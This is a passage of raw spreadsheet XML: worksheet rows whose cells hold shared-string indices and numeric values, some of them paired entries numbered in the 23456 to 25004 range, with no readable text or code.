      <c r="G12583" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="12584" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12584" t="s">
        <v>18026</v>
      </c>
      <c r="D12584" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12585" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12585" t="s">
        <v>18027</v>
      </c>
      <c r="B12585">
        <v>23456</v>
      </c>
      <c r="C12585" t="s">
        <v>1345</v>
      </c>
      <c r="D12585" t="s">
        <v>18028</v>
      </c>
      <c r="E12585" t="s">
        <v>18029</v>
      </c>
      <c r="F12585" t="s">
        <v>18029</v>
      </c>
      <c r="G12585">
        <v>39856</v>
      </c>
    </row>
    <row r="12586" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12586">
        <v>23456</v>
      </c>
      <c r="C12586" t="s">
        <v>1348</v>
      </c>
      <c r="D12586" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12587" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12587" t="s">
        <v>18030</v>
      </c>
      <c r="B12587">
        <v>23457</v>
      </c>
      <c r="C12587" t="s">
        <v>1345</v>
      </c>
      <c r="D12587" t="s">
        <v>18031</v>
      </c>
      <c r="E12587" t="s">
        <v>18029</v>
      </c>
      <c r="F12587" t="s">
        <v>18029</v>
      </c>
      <c r="G12587">
        <v>39856</v>
      </c>
    </row>
    <row r="12588" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12588">
        <v>23457</v>
      </c>
      <c r="C12588" t="s">
        <v>1348</v>
      </c>
      <c r="D12588" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12589" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12589" t="s">
        <v>18032</v>
      </c>
      <c r="D12589" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12590" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12590" t="s">
        <v>18033</v>
      </c>
      <c r="B12590">
        <v>23546</v>
      </c>
      <c r="C12590" t="s">
        <v>1345</v>
      </c>
      <c r="D12590" t="s">
        <v>18034</v>
      </c>
      <c r="E12590" t="s">
        <v>18035</v>
      </c>
      <c r="F12590" t="s">
        <v>18036</v>
      </c>
      <c r="G12590">
        <v>41060</v>
      </c>
    </row>
    <row r="12591" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12591">
        <v>23546</v>
      </c>
      <c r="C12591" t="s">
        <v>1348</v>
      </c>
      <c r="D12591" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12592" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12592" t="s">
        <v>18037</v>
      </c>
      <c r="D12592" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12593" t="s">
        <v>18038</v>
      </c>
      <c r="B12593">
        <v>24000</v>
      </c>
      <c r="C12593" t="s">
        <v>1345</v>
      </c>
      <c r="D12593" t="s">
        <v>18038</v>
      </c>
      <c r="E12593" t="s">
        <v>18039</v>
      </c>
      <c r="F12593" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12594" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12594" t="s">
        <v>18038</v>
      </c>
      <c r="B12594">
        <v>24000</v>
      </c>
      <c r="C12594" t="s">
        <v>1348</v>
      </c>
      <c r="D12594" t="s">
        <v>18038</v>
      </c>
      <c r="E12594" t="s">
        <v>18039</v>
      </c>
      <c r="F12594" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12595" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12595" t="s">
        <v>18040</v>
      </c>
      <c r="B12595">
        <v>24001</v>
      </c>
      <c r="C12595" t="s">
        <v>1345</v>
      </c>
      <c r="D12595" t="s">
        <v>18040</v>
      </c>
      <c r="E12595" t="s">
        <v>18039</v>
      </c>
      <c r="F12595" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12596" t="s">
        <v>18040</v>
      </c>
      <c r="B12596">
        <v>24001</v>
      </c>
      <c r="C12596" t="s">
        <v>1348</v>
      </c>
      <c r="D12596" t="s">
        <v>18040</v>
      </c>
      <c r="E12596" t="s">
        <v>18039</v>
      </c>
      <c r="F12596" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12597" t="s">
        <v>18041</v>
      </c>
      <c r="B12597">
        <v>24002</v>
      </c>
      <c r="C12597" t="s">
        <v>1345</v>
      </c>
      <c r="D12597" t="s">
        <v>18041</v>
      </c>
      <c r="E12597" t="s">
        <v>18039</v>
      </c>
      <c r="F12597" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12598" t="s">
        <v>18041</v>
      </c>
      <c r="B12598">
        <v>24002</v>
      </c>
      <c r="C12598" t="s">
        <v>1348</v>
      </c>
      <c r="D12598" t="s">
        <v>18041</v>
      </c>
      <c r="E12598" t="s">
        <v>18039</v>
      </c>
      <c r="F12598" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12599" t="s">
        <v>18042</v>
      </c>
      <c r="B12599">
        <v>24003</v>
      </c>
      <c r="C12599" t="s">
        <v>1345</v>
      </c>
      <c r="D12599" t="s">
        <v>18042</v>
      </c>
      <c r="E12599" t="s">
        <v>18039</v>
      </c>
      <c r="F12599" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12600" t="s">
        <v>18042</v>
      </c>
      <c r="B12600">
        <v>24003</v>
      </c>
      <c r="C12600" t="s">
        <v>1348</v>
      </c>
      <c r="D12600" t="s">
        <v>18042</v>
      </c>
      <c r="E12600" t="s">
        <v>18039</v>
      </c>
      <c r="F12600" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12601" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12601" t="s">
        <v>18043</v>
      </c>
      <c r="B12601">
        <v>24004</v>
      </c>
      <c r="C12601" t="s">
        <v>1345</v>
      </c>
      <c r="D12601" t="s">
        <v>18043</v>
      </c>
      <c r="E12601" t="s">
        <v>18039</v>
      </c>
      <c r="F12601" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12602" t="s">
        <v>18043</v>
      </c>
      <c r="B12602">
        <v>24004</v>
      </c>
      <c r="C12602" t="s">
        <v>1348</v>
      </c>
      <c r="D12602" t="s">
        <v>18043</v>
      </c>
      <c r="E12602" t="s">
        <v>18039</v>
      </c>
      <c r="F12602" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12603" t="s">
        <v>18044</v>
      </c>
      <c r="B12603">
        <v>24005</v>
      </c>
      <c r="C12603" t="s">
        <v>1345</v>
      </c>
      <c r="D12603" t="s">
        <v>18044</v>
      </c>
      <c r="E12603" t="s">
        <v>18039</v>
      </c>
      <c r="F12603" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12604" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12604" t="s">
        <v>18044</v>
      </c>
      <c r="B12604">
        <v>24005</v>
      </c>
      <c r="C12604" t="s">
        <v>1348</v>
      </c>
      <c r="D12604" t="s">
        <v>18044</v>
      </c>
      <c r="E12604" t="s">
        <v>18039</v>
      </c>
      <c r="F12604" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12605" t="s">
        <v>18045</v>
      </c>
      <c r="B12605">
        <v>24006</v>
      </c>
      <c r="C12605" t="s">
        <v>1345</v>
      </c>
      <c r="D12605" t="s">
        <v>18045</v>
      </c>
      <c r="E12605" t="s">
        <v>18039</v>
      </c>
      <c r="F12605" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12606" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12606" t="s">
        <v>18045</v>
      </c>
      <c r="B12606">
        <v>24006</v>
      </c>
      <c r="C12606" t="s">
        <v>1348</v>
      </c>
      <c r="D12606" t="s">
        <v>18045</v>
      </c>
      <c r="E12606" t="s">
        <v>18039</v>
      </c>
      <c r="F12606" t="s">
        <v>18039</v>
      </c>
    </row>
    <row r="12607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="B12607" t="s">
        <v>18046</v>
      </c>
      <c r="D12607" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12608" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12608" t="s">
        <v>18047</v>
      </c>
      <c r="B12608">
        <v>24242</v>
      </c>
      <c r="C12608" t="s">
        <v>1345</v>
      </c>
      <c r="D12608" t="s">
        <v>18048</v>
      </c>
      <c r="E12608" t="s">
        <v>18049</v>
      </c>
      <c r="F12608" t="s">
        <v>18049</v>
      </c>
    </row>
    <row r="12609" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12609" t="s">
        <v>18047</v>
      </c>
      <c r="B12609">
        <v>24242</v>
      </c>
      <c r="C12609" t="s">
        <v>1348</v>
      </c>
      <c r="D12609" t="s">
        <v>18048</v>
      </c>
      <c r="E12609" t="s">
        <v>18049</v>
      </c>
      <c r="F12609" t="s">
        <v>18049</v>
      </c>
    </row>
    <row r="12610" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12610" t="s">
        <v>18050</v>
      </c>
      <c r="D12610" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12611" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12611" t="s">
        <v>18051</v>
      </c>
      <c r="B12611">
        <v>24249</v>
      </c>
      <c r="C12611" t="s">
        <v>1345</v>
      </c>
      <c r="D12611" t="s">
        <v>18052</v>
      </c>
      <c r="E12611" t="s">
        <v>18053</v>
      </c>
      <c r="F12611" t="s">
        <v>18053</v>
      </c>
    </row>
    <row r="12612" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12612" t="s">
        <v>18051</v>
      </c>
      <c r="B12612">
        <v>24249</v>
      </c>
      <c r="C12612" t="s">
        <v>1348</v>
      </c>
      <c r="D12612" t="s">
        <v>18052</v>
      </c>
      <c r="E12612" t="s">
        <v>18053</v>
      </c>
      <c r="F12612" t="s">
        <v>18053</v>
      </c>
    </row>
    <row r="12613" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12613" t="s">
        <v>18054</v>
      </c>
      <c r="D12613" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12614" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12614" t="s">
        <v>18055</v>
      </c>
      <c r="B12614">
        <v>24321</v>
      </c>
      <c r="C12614" t="s">
        <v>1345</v>
      </c>
      <c r="D12614" t="s">
        <v>18056</v>
      </c>
      <c r="E12614" t="s">
        <v>18057</v>
      </c>
      <c r="F12614" t="s">
        <v>18057</v>
      </c>
      <c r="G12614" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="12615" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12615" t="s">
        <v>18055</v>
      </c>
      <c r="B12615">
        <v>24321</v>
      </c>
      <c r="C12615" t="s">
        <v>1348</v>
      </c>
      <c r="D12615" t="s">
        <v>18056</v>
      </c>
      <c r="E12615" t="s">
        <v>18057</v>
      </c>
      <c r="F12615" t="s">
        <v>18057</v>
      </c>
      <c r="G12615" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="12616" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12616" t="s">
        <v>18058</v>
      </c>
      <c r="B12616">
        <v>24322</v>
      </c>
      <c r="C12616" t="s">
        <v>1348</v>
      </c>
      <c r="D12616" t="s">
        <v>18059</v>
      </c>
      <c r="E12616" t="s">
        <v>18060</v>
      </c>
      <c r="F12616" t="s">
        <v>18061</v>
      </c>
      <c r="G12616">
        <v>41257</v>
      </c>
    </row>
    <row r="12617" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12617">
        <v>24322</v>
      </c>
      <c r="C12617" t="s">
        <v>1345</v>
      </c>
      <c r="D12617" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12618" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12618" t="s">
        <v>18062</v>
      </c>
      <c r="B12618">
        <v>24323</v>
      </c>
      <c r="C12618" t="s">
        <v>1345</v>
      </c>
      <c r="D12618" t="s">
        <v>18063</v>
      </c>
      <c r="E12618" t="s">
        <v>18064</v>
      </c>
      <c r="F12618" t="s">
        <v>18065</v>
      </c>
      <c r="G12618">
        <v>43327</v>
      </c>
    </row>
    <row r="12619" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12619">
        <v>24323</v>
      </c>
      <c r="C12619" t="s">
        <v>1348</v>
      </c>
      <c r="D12619" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12620" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12620" t="s">
        <v>18066</v>
      </c>
      <c r="D12620" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12621" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12621" t="s">
        <v>18067</v>
      </c>
      <c r="B12621">
        <v>24386</v>
      </c>
      <c r="C12621" t="s">
        <v>1345</v>
      </c>
      <c r="D12621" t="s">
        <v>18068</v>
      </c>
      <c r="E12621" t="s">
        <v>18069</v>
      </c>
      <c r="F12621" t="s">
        <v>18069</v>
      </c>
    </row>
    <row r="12622" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12622" t="s">
        <v>18070</v>
      </c>
      <c r="B12622">
        <v>24386</v>
      </c>
      <c r="C12622" t="s">
        <v>1345</v>
      </c>
      <c r="D12622" t="s">
        <v>18071</v>
      </c>
      <c r="E12622" t="s">
        <v>18069</v>
      </c>
      <c r="F12622" t="s">
        <v>18069</v>
      </c>
      <c r="L12622" t="s">
        <v>18072</v>
      </c>
    </row>
    <row r="12623" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12623" t="s">
        <v>18067</v>
      </c>
      <c r="B12623">
        <v>24386</v>
      </c>
      <c r="C12623" t="s">
        <v>1348</v>
      </c>
      <c r="D12623" t="s">
        <v>18068</v>
      </c>
      <c r="E12623" t="s">
        <v>18069</v>
      </c>
      <c r="F12623" t="s">
        <v>18069</v>
      </c>
    </row>
    <row r="12624" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12624" t="s">
        <v>18070</v>
      </c>
      <c r="B12624">
        <v>24386</v>
      </c>
      <c r="C12624" t="s">
        <v>1348</v>
      </c>
      <c r="D12624" t="s">
        <v>18071</v>
      </c>
      <c r="E12624" t="s">
        <v>18069</v>
      </c>
      <c r="F12624" t="s">
        <v>18069</v>
      </c>
      <c r="L12624" t="s">
        <v>18072</v>
      </c>
    </row>
    <row r="12625" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12625" t="s">
        <v>18073</v>
      </c>
      <c r="D12625" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12626" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12626" t="s">
        <v>18074</v>
      </c>
      <c r="B12626">
        <v>24465</v>
      </c>
      <c r="C12626" t="s">
        <v>1345</v>
      </c>
      <c r="D12626" t="s">
        <v>18075</v>
      </c>
      <c r="E12626" t="s">
        <v>18076</v>
      </c>
      <c r="F12626" t="s">
        <v>18076</v>
      </c>
      <c r="G12626">
        <v>39647</v>
      </c>
    </row>
    <row r="12627" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12627" t="s">
        <v>18074</v>
      </c>
      <c r="B12627">
        <v>24465</v>
      </c>
      <c r="C12627" t="s">
        <v>1348</v>
      </c>
      <c r="D12627" t="s">
        <v>18075</v>
      </c>
      <c r="E12627" t="s">
        <v>18076</v>
      </c>
      <c r="F12627" t="s">
        <v>18076</v>
      </c>
      <c r="G12627">
        <v>39647</v>
      </c>
    </row>
    <row r="12628" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12628" t="s">
        <v>18077</v>
      </c>
      <c r="D12628" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12629" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12629" t="s">
        <v>18078</v>
      </c>
      <c r="B12629">
        <v>24554</v>
      </c>
      <c r="C12629" t="s">
        <v>1345</v>
      </c>
      <c r="D12629" t="s">
        <v>18079</v>
      </c>
      <c r="E12629" t="s">
        <v>18080</v>
      </c>
      <c r="F12629" t="s">
        <v>18080</v>
      </c>
      <c r="H12629">
        <v>43984</v>
      </c>
    </row>
    <row r="12630" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12630" t="s">
        <v>18078</v>
      </c>
      <c r="B12630">
        <v>24554</v>
      </c>
      <c r="C12630" t="s">
        <v>1348</v>
      </c>
      <c r="D12630" t="s">
        <v>18079</v>
      </c>
      <c r="E12630" t="s">
        <v>18080</v>
      </c>
      <c r="F12630" t="s">
        <v>18080</v>
      </c>
      <c r="H12630">
        <v>43984</v>
      </c>
    </row>
    <row r="12631" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12631" t="s">
        <v>18081</v>
      </c>
      <c r="D12631" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12632" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12632" t="s">
        <v>18082</v>
      </c>
      <c r="B12632">
        <v>24577</v>
      </c>
      <c r="C12632" t="s">
        <v>1345</v>
      </c>
      <c r="D12632" t="s">
        <v>18083</v>
      </c>
      <c r="E12632" t="s">
        <v>18084</v>
      </c>
      <c r="F12632" t="s">
        <v>18085</v>
      </c>
      <c r="G12632">
        <v>41866</v>
      </c>
    </row>
    <row r="12633" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12633" t="s">
        <v>18086</v>
      </c>
      <c r="B12633">
        <v>24577</v>
      </c>
      <c r="C12633" t="s">
        <v>1348</v>
      </c>
      <c r="D12633" t="s">
        <v>18087</v>
      </c>
      <c r="E12633" t="s">
        <v>18084</v>
      </c>
      <c r="F12633" t="s">
        <v>18085</v>
      </c>
      <c r="G12633">
        <v>41866</v>
      </c>
    </row>
    <row r="12634" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12634" t="s">
        <v>18088</v>
      </c>
      <c r="D12634" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12635" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12635" t="s">
        <v>18089</v>
      </c>
      <c r="B12635">
        <v>24666</v>
      </c>
      <c r="C12635" t="s">
        <v>1345</v>
      </c>
      <c r="D12635" t="s">
        <v>18090</v>
      </c>
      <c r="E12635" t="s">
        <v>18091</v>
      </c>
      <c r="F12635" t="s">
        <v>18092</v>
      </c>
      <c r="G12635">
        <v>42067</v>
      </c>
    </row>
    <row r="12636" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12636">
        <v>24666</v>
      </c>
      <c r="C12636" t="s">
        <v>1348</v>
      </c>
      <c r="D12636" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12637" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12637" t="s">
        <v>18093</v>
      </c>
      <c r="D12637" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12638" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12638" t="s">
        <v>18094</v>
      </c>
      <c r="B12638">
        <v>24676</v>
      </c>
      <c r="C12638" t="s">
        <v>1345</v>
      </c>
      <c r="D12638" t="s">
        <v>18095</v>
      </c>
      <c r="E12638" t="s">
        <v>18096</v>
      </c>
      <c r="F12638" t="s">
        <v>18096</v>
      </c>
      <c r="G12638">
        <v>39882</v>
      </c>
    </row>
    <row r="12639" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12639" t="s">
        <v>18094</v>
      </c>
      <c r="B12639">
        <v>24676</v>
      </c>
      <c r="C12639" t="s">
        <v>1348</v>
      </c>
      <c r="D12639" t="s">
        <v>18095</v>
      </c>
      <c r="E12639" t="s">
        <v>18096</v>
      </c>
      <c r="F12639" t="s">
        <v>18096</v>
      </c>
      <c r="G12639">
        <v>39882</v>
      </c>
    </row>
    <row r="12640" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12640" t="s">
        <v>18097</v>
      </c>
      <c r="B12640">
        <v>24677</v>
      </c>
      <c r="C12640" t="s">
        <v>1345</v>
      </c>
      <c r="D12640" t="s">
        <v>18098</v>
      </c>
      <c r="E12640" t="s">
        <v>18099</v>
      </c>
      <c r="F12640" t="s">
        <v>18099</v>
      </c>
    </row>
    <row r="12641" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12641" t="s">
        <v>18097</v>
      </c>
      <c r="B12641">
        <v>24677</v>
      </c>
      <c r="C12641" t="s">
        <v>1348</v>
      </c>
      <c r="D12641" t="s">
        <v>18098</v>
      </c>
      <c r="E12641" t="s">
        <v>18099</v>
      </c>
      <c r="F12641" t="s">
        <v>18099</v>
      </c>
    </row>
    <row r="12642" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12642" t="s">
        <v>18100</v>
      </c>
      <c r="B12642">
        <v>24678</v>
      </c>
      <c r="C12642" t="s">
        <v>1345</v>
      </c>
      <c r="D12642" t="s">
        <v>18101</v>
      </c>
      <c r="E12642" t="s">
        <v>18099</v>
      </c>
      <c r="F12642" t="s">
        <v>18099</v>
      </c>
    </row>
    <row r="12643" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12643" t="s">
        <v>18100</v>
      </c>
      <c r="B12643">
        <v>24678</v>
      </c>
      <c r="C12643" t="s">
        <v>1348</v>
      </c>
      <c r="D12643" t="s">
        <v>18101</v>
      </c>
      <c r="E12643" t="s">
        <v>18099</v>
      </c>
      <c r="F12643" t="s">
        <v>18099</v>
      </c>
    </row>
    <row r="12644" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12644">
        <v>24679</v>
      </c>
      <c r="D12644" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12645" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12645" t="s">
        <v>18102</v>
      </c>
      <c r="B12645">
        <v>24680</v>
      </c>
      <c r="C12645" t="s">
        <v>1345</v>
      </c>
      <c r="D12645" t="s">
        <v>18103</v>
      </c>
      <c r="E12645" t="s">
        <v>18104</v>
      </c>
      <c r="F12645" t="s">
        <v>18104</v>
      </c>
      <c r="G12645" t="s">
        <v>6391</v>
      </c>
    </row>
    <row r="12646" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12646" t="s">
        <v>18102</v>
      </c>
      <c r="B12646">
        <v>24680</v>
      </c>
      <c r="C12646" t="s">
        <v>1348</v>
      </c>
      <c r="D12646" t="s">
        <v>18103</v>
      </c>
      <c r="E12646" t="s">
        <v>18104</v>
      </c>
      <c r="F12646" t="s">
        <v>18104</v>
      </c>
      <c r="G12646" t="s">
        <v>6391</v>
      </c>
    </row>
    <row r="12647" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12647" t="s">
        <v>18105</v>
      </c>
      <c r="D12647" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12648" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12648" t="s">
        <v>18106</v>
      </c>
      <c r="B12648">
        <v>24754</v>
      </c>
      <c r="C12648" t="s">
        <v>1345</v>
      </c>
      <c r="D12648" t="s">
        <v>18107</v>
      </c>
      <c r="E12648" t="s">
        <v>18108</v>
      </c>
      <c r="F12648" t="s">
        <v>18108</v>
      </c>
      <c r="G12648">
        <v>39920</v>
      </c>
    </row>
    <row r="12649" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12649">
        <v>24754</v>
      </c>
      <c r="C12649" t="s">
        <v>1348</v>
      </c>
      <c r="D12649" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12650" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12650" t="s">
        <v>18109</v>
      </c>
      <c r="D12650" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12651" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12651">
        <v>24850</v>
      </c>
      <c r="C12651" t="s">
        <v>1345</v>
      </c>
      <c r="D12651" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12652" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12652" t="s">
        <v>18110</v>
      </c>
      <c r="B12652">
        <v>24850</v>
      </c>
      <c r="C12652" t="s">
        <v>1348</v>
      </c>
      <c r="D12652" t="s">
        <v>18111</v>
      </c>
      <c r="E12652" t="s">
        <v>18112</v>
      </c>
      <c r="F12652" t="s">
        <v>18113</v>
      </c>
      <c r="G12652">
        <v>41087</v>
      </c>
    </row>
    <row r="12653" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12653" t="s">
        <v>18114</v>
      </c>
      <c r="D12653" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12654" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12654" t="s">
        <v>18115</v>
      </c>
      <c r="B12654">
        <v>24922</v>
      </c>
      <c r="C12654" t="s">
        <v>1345</v>
      </c>
      <c r="D12654" t="s">
        <v>18116</v>
      </c>
      <c r="E12654" t="s">
        <v>18117</v>
      </c>
      <c r="F12654" t="s">
        <v>18117</v>
      </c>
    </row>
    <row r="12655" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12655" t="s">
        <v>18115</v>
      </c>
      <c r="B12655">
        <v>24922</v>
      </c>
      <c r="C12655" t="s">
        <v>1348</v>
      </c>
      <c r="D12655" t="s">
        <v>18116</v>
      </c>
      <c r="E12655" t="s">
        <v>18117</v>
      </c>
      <c r="F12655" t="s">
        <v>18117</v>
      </c>
    </row>
    <row r="12656" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12656" t="s">
        <v>18118</v>
      </c>
      <c r="D12656" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12657" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12657" t="s">
        <v>18119</v>
      </c>
      <c r="B12657">
        <v>25000</v>
      </c>
      <c r="C12657" t="s">
        <v>1345</v>
      </c>
      <c r="D12657" t="s">
        <v>18119</v>
      </c>
      <c r="E12657" t="s">
        <v>18120</v>
      </c>
      <c r="F12657" t="s">
        <v>18120</v>
      </c>
    </row>
    <row r="12658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12658" t="s">
        <v>18119</v>
      </c>
      <c r="B12658">
        <v>25000</v>
      </c>
      <c r="C12658" t="s">
        <v>1348</v>
      </c>
      <c r="D12658" t="s">
        <v>18119</v>
      </c>
      <c r="E12658" t="s">
        <v>18120</v>
      </c>
      <c r="F12658" t="s">
        <v>18120</v>
      </c>
    </row>
    <row r="12659" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12659" t="s">
        <v>18121</v>
      </c>
      <c r="B12659">
        <v>25001</v>
      </c>
      <c r="C12659" t="s">
        <v>1345</v>
      </c>
      <c r="D12659" t="s">
        <v>18121</v>
      </c>
      <c r="E12659" t="s">
        <v>18120</v>
      </c>
      <c r="F12659" t="s">
        <v>18120</v>
      </c>
    </row>
    <row r="12660" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12660" t="s">
        <v>18121</v>
      </c>
      <c r="B12660">
        <v>25001</v>
      </c>
      <c r="C12660" t="s">
        <v>1348</v>
      </c>
      <c r="D12660" t="s">
        <v>18121</v>
      </c>
      <c r="E12660" t="s">
        <v>18120</v>
      </c>
      <c r="F12660" t="s">
        <v>18120</v>
      </c>
    </row>
    <row r="12661" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12661" t="s">
        <v>18122</v>
      </c>
      <c r="B12661">
        <v>25002</v>
      </c>
      <c r="C12661" t="s">
        <v>1345</v>
      </c>
      <c r="D12661" t="s">
        <v>18122</v>
      </c>
      <c r="E12661" t="s">
        <v>18120</v>
      </c>
      <c r="F12661" t="s">
        <v>18120</v>
      </c>
    </row>
    <row r="12662" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12662" t="s">
        <v>18122</v>
      </c>
      <c r="B12662">
        <v>25002</v>
      </c>
      <c r="C12662" t="s">
        <v>1348</v>
      </c>
      <c r="D12662" t="s">
        <v>18122</v>
      </c>
      <c r="E12662" t="s">
        <v>18120</v>
      </c>
      <c r="F12662" t="s">
        <v>18120</v>
      </c>
    </row>
    <row r="12663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12663" t="s">
        <v>18123</v>
      </c>
      <c r="B12663">
        <v>25003</v>
      </c>
      <c r="C12663" t="s">
        <v>1345</v>
      </c>
      <c r="D12663" t="s">
        <v>18123</v>
      </c>
      <c r="E12663" t="s">
        <v>18120</v>
      </c>
      <c r="F12663" t="s">
        <v>18120</v>
      </c>
    </row>
    <row r="12664" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12664" t="s">
        <v>18123</v>
      </c>
      <c r="B12664">
        <v>25003</v>
      </c>
      <c r="C12664" t="s">
        <v>1348</v>
      </c>
      <c r="D12664" t="s">
        <v>18123</v>
      </c>
      <c r="E12664" t="s">
        <v>18120</v>
      </c>
      <c r="F12664" t="s">
        <v>18120</v>
      </c>
    </row>
    <row r="12665" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12665" t="s">
        <v>18124</v>
      </c>
      <c r="B12665">
        <v>25004</v>
      </c>
      <c r="C12665" t="s">
        <v>1345</v>
      </c>
      <c r="D12665" t="s">
        <v>18124</v>
      </c>
      <c r="E12665" t="s">
        <v>18120</v>
      </c>
      <c r="F12665" t="s">
        <v>18120</v>
      </c>
    </row>
    <row r="12666" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12666" t="s">
        <v>18124</v>
      </c>
      <c r="B12666">
        <v>25004</v>
      </c>
      <c r="C12666" t="s">
